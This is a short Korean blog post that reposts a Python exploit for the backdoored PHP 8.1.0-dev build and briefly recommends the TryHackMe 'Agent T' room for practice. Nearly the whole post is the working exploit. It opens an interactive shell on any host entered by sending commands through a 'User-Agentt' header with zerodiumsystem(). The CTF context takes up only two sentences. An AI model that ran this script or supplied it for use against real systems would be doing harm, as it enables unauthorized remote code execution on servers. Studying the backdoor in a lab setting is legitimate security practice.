728x90
# Exploit Title: PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution
# Date: 23 may 2021
# Exploit Author: flast101
# Vendor Homepage: https://www.php.net/
# Software Link:
# Version: 8.1.0-dev
# Tested on: Ubuntu 20.04
# References:
#!/usr/bin/env python3
import os
import re
import requests
host = input("Enter the full host url:\n") #host url
request = requests.Session()
response = request.get(host)
if str(response) == '<Response [200]>':
print("\nInteractive shell is opened on", host, "\nCan't acces tty; job crontol turned off.")
try:
while 1:
cmd = input("$ ") #rce
headers = {
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0",
"User-Agentt": "zerodiumsystem('" + cmd + "');"
}
response = request.get(host, headers = headers, allow_redirects = False)
current_page = response.text
stdout = current_page.split('<!DOCTYPE html>',1)
text = print(stdout[0])
except KeyboardInterrupt:
print("Exiting...")
exit
else: #fail
print("\r")
print(response)
print("Host is not available, aborting...")
exit
오늘은 위에 나오는 아름다운 코드를 직접 실습해볼 수 있는 tryhackme Agent T를 간단 리뷰해보겠습니다.
사실 이 문제 자체는 너무 쉽습니다. 해당 코드를 실행해서 url을 입력만 해줘도 rce가 진행되기 때문입니다.
728x90
'호그와트' 카테고리의 다른 글
제 주문은 콤비네이션인데요 (0) | 2022.11.18 |
---|---|
우리 집에서 바이너리 보구 갈래? 2 (0) | 2022.11.18 |
우리 집에서 바이너리 보구 갈래? (0) | 2022.11.17 |
거북이의 습격 (0) | 2022.11.16 |
$title 치킨 소스 (0) | 2022.11.15 |